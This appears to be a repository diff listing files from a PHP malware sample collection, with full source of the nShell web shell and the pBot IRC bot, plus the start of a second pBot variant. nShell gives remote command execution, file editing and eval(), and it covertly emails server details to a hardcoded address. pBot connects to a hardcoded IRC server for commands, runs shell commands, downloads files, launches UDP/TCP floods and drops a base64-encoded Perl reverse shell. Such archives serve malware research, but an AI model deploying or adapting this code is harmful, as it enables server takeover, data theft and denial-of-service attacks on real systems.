duqu+="chr("+strcode.charCodeAt(strcode.length-1)+")";
}
else
duqu+=strcode.charAt(strcode.length-1);
return duqu
}
</script>

5603
PHP/Backdoor.PHP.NFMshell.c Normal file
View File

File diff suppressed because it is too large Load Diff

1464
PHP/Backdoor.PHP.NShell.a Normal file
View File

File diff suppressed because it is too large Load Diff

371
PHP/Backdoor.PHP.NShell.c Normal file
View File

@ -0,0 +1,371 @@
?»?<head>
<title> nShell v1.0</title>
<style>
html { overflow-x: auto }
A: {font-weight:bold};
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #444444;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
table {
BORDER-RIGHT: :#444444 1px outset;
BORDER-TOP: :#444444 1px outset;
BORDER-LEFT: :#444444 1px outset;
BORDER-BOTTOM: :#444444 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: :#444444 1px solid;
BORDER-LEFT: :#444444 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
div,td,table {
font-family:Georgia;
}
</style>
</head>
<body bgcolor=":#444444">
<center>
<?php
error_reporting(0);
$function=passthru; // system, exec, cmd
$myname=$_SERVER['SCRIPT_NAME'];
echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
?>
<table width="80%" border="0">
<td colspan="3" align="center">
<?php
function ex($comd)
{
$res = '';
if(function_exists("system"))
{
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists("passthru"))
{
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists("exec"))
{
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists("shell_exec"))
{
$res=shell_exec($comd);
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
return $res;
}
// safe mod
$safe_mode=@ini_get('safe_mode');
echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
echo " ";
// phpversion
echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
echo " ";
// curl
$curl_on = @function_exists('curl_version');
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
echo " ";
// mysql
echo "MYSQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// msssql
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// PostgreSQL
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// Oracle
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo "<br>";
echo " ";
// Disable function
echo "Disable functions : <b>";
$df=@ini_get('disable_functions');
if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
echo " ";
//==============xac dinh os==================
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft)){
$sertype = "win";
}
else
{
$sertype = "nix";
}
//=========================================
$uname=ex('uname -a');
echo "<br>OS: </b><font color=blue>";
if (empty($uname)){
echo (php_uname()."</font><br><b>");
}else
echo $uname."</font><br><b>";
$id = ex('id');
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)){
echo $id."</font><br><b>";
}else
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
"</font><br><b>";
echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
?>
</td><tr>
<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
<td colspan="3" >
<?php
$act=@$_GET['act'];
if($act=="info"){
echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
phpinfo();
echo "</center>";
}
?>
<?php
//=========================================================
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
//===================Delect File=============================
$del=$_GET['del'];
function delfile($name)
{
passthru("del ".$name);
}
function deldir($name)
{
passthru("rmdir ".$name);
}
if($del)
{
if(is_file($del)) delfile($del); else deldir($del);
}
//==================Quan li thu muc ==========================
if($act=="manager"){
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
$file = $file . "<tr><td><a href=".$link ." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
}
// view file ex: /etc/passwd
if(isset($_REQUEST['file']))
{
$file=@$_REQUEST["file"];
echo "<b>File :</b><font color=red> ". $file."</font>";
$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
$src=@fread($fp,filesize($file));
echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
$addtxt=@$_POST["addtxt"];
rewind($fp);
if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
if($rs==true)
{
echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
}
ftruncate($fp,ftell($fp));
echo "</center>";
}
?>
<?php
// function
function exe_u($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong update du lieu duoc !");
if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
}
function exe_c($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong Create duoc !");
echo "This is Ok ! ^.^<br>" ;
}
function exe_d($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong Drop duoc !");
echo "This is Ok ! ^.^<br>" ;
}
function exe_w($query)
{
echo "<b><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong the show gi duoc het !");
if(eregi("fields",$query)) {
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
echo "<b><font color=red>".$row['Field']." :</font></ b> ".$row['Type'];
echo "<br>";
}
} else {
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
while(list($key,$value)=each($row))
{
echo "<font color=red><b>".$value."</b><font>";
}
echo "<br>";
}
}
}
function exe_s($query)
{
$arrstr=@array();$i=0;
$arrstr=explode(" ",$query);
$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
$i++;
$arrstr[$i]=$find_row['Field'];
}
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong the select gi duoc het !");
$row=@mysql_num_rows($result);
}
function sql($string)
{
$arr=@array();
$arr=explode(";",$string);
for($i=0;$i<=count($arr);$i++)
{
$check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
$check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
$check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
}
}
//=====xong phan function cho sql
// Sql query
if($act=="sql")
{
if(isset($_GET['srname'])&&isset($_GET['pass']))
{
echo $_GET['srname'];
if(!isset($_GET['srname'])) $servername=$_GET['srname'];
else $servername="localhost";
$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
$form2="<center><form method=post action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
echo $form2;
$str=@$_POST['str'];
if(isset($str)) sql($str);
}
else {
echo "chao";
$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
echo $form1;
}
}
?>
<?php
if($act=="eval"){
$script=$_POST['script'];
if(!$script){
echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
}else{
eval($script);
}
}
?>
</td>
</table>
<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
</center>
</body>

2136
PHP/Backdoor.PHP.Nst.e Normal file
View File

File diff suppressed because one or more lines are too long

2136
PHP/Backdoor.PHP.Nst.f Normal file
View File

File diff suppressed because one or more lines are too long

514
PHP/Backdoor.PHP.Pbot.a Normal file
View File

@ -0,0 +1,514 @@
<?
/*
*
* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
* Friend: LP <fuckerboy@sercret.gov>
* COMMANDS:
*
* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
var $config = array("server"=>"76.76.4.183",
"port"=>"55555",
"pass"=>"",
"prefix"=>"TX",
"maxrand"=>"4",
"chan"=>"#n3",
"chan2"=>"#n3",
"key"=>"jimi",
"modes"=>"+p",
"password"=>"und56",
"trigger"=>".",
"hostauth"=>"ircos.org" // * for any hostname (remember: /setvhost pucorp.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
?>

516
PHP/Backdoor.PHP.Pbot.b Normal file
View File

@ -0,0 +1,516 @@
<?
/*
*
* #korban. since 2003
* edited by: devil__ <admin@xdevil.org>
*
* COMMANDS:
*
* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
